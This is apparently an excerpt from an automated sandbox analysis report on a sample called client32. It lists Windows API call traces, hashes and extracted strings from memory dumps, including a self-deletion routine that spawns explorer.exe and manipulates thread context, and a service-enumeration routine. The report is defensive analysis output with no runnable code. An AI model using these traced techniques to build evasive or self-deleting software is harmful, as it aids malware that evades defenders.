                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3768737497-0
                                                                                                                                                                                                    • Opcode ID: e91e58146c058111e7b7113359dd99c74d9fb6d4d003e3a9145b0d7ba1864261
                                                                                                                                                                                                    • Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e91e58146c058111e7b7113359dd99c74d9fb6d4d003e3a9145b0d7ba1864261
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010A34
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3382485803-0
                                                                                                                                                                                                    • Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                                                                                                    • Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                                                                                                      • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,685B6F16,00000000,?,685BD40B,00000001,685B6F16,00000000,00000000,00000000,?,685B6F16,00000001,00000214), ref: 685BA0C5
                                                                                                                                                                                                      • Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __waccess_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4272103461-0
                                                                                                                                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                                                    • Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __fsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3646066109-0
                                                                                                                                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                                                    • Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4094618180.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094591498.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094652158.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Client32@8
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 433899448-0
                                                                                                                                                                                                    • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 687E09A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 687E09E8
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 6880F1D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeapSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201116106-0
                                                                                                                                                                                                    • Opcode ID: b6b0c9f1491dee994ec473a50c7df72eefb8b705c33e06370d2d1d618162b90f
                                                                                                                                                                                                    • Instruction ID: 274beece8e3844bfc3e8e2f38e42855b16748084e614c2412fab217671f2a4c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b0c9f1491dee994ec473a50c7df72eefb8b705c33e06370d2d1d618162b90f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0A035980114ABCB105B79DE19A8A3AA6ABC2773B900733F93CC21E0DA318501C2F2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11123590
                                                                                                                                                                                                    • _memset.LIBCMT ref: 111235AD
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 111235C6
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 111235E5
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112362B
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 1112363A
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11123673
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,111B3308,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112369F
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236AC
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236C7
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 111236D7
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 111236F1
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112371D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112372E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11123737
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112373A
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 11123770
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11123812
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123815
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123818
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112382C
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 1112383B
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 111238B4
                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111238D4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
• String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
• API String ID: 2219718054-800295887
• Opcode ID: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
• Instruction ID: f5da5898e03af7335dd3b432591c065ee650f23ce63a0b1c8c4037c06c323e7f
• Opcode Fuzzy Hash: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
• Instruction Fuzzy Hash: E2B186B5A44329AFE720DF54CC85FDAF7B8EB48704F108199E619A72C0DB70AA44CF55
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ManagerOpen
• String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
• API String ID: 1889721586-3267302290
• Opcode ID: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
• Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
• Opcode Fuzzy Hash: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
• Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50
APIs
• GetMenu.USER32(?), ref: 11025347
• DrawMenuBar.USER32(?), ref: 1102535E
• GetMenu.USER32(?), ref: 110253B3
• DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
• SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
• UpdateWindow.USER32(?), ref: 11025407
• IsIconic.USER32(?), ref: 1102541A
• SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
• KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
• String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 3085788722-363603473
• Opcode ID: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
• Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
• Opcode Fuzzy Hash: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
• Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95
APIs
• _calloc.LIBCMT ref: 1103B306
• _free.LIBCMT ref: 1103B400
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
  • Part of subcall function 110CCAD0: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110CCB55
  • Part of subcall function 110CCAD0: LoadResource.KERNEL32(00000000,00000000), ref: 110CCB84
  • Part of subcall function 110CCAD0: LockResource.KERNEL32(00000000), ref: 110CCBA8
  • Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBD9
  • Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBF4
  • Part of subcall function 110CCAD0: GetLastError.KERNEL32 ref: 110CCC19
• _calloc.LIBCMT ref: 1103B415
• _free.LIBCMT ref: 1103B450
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
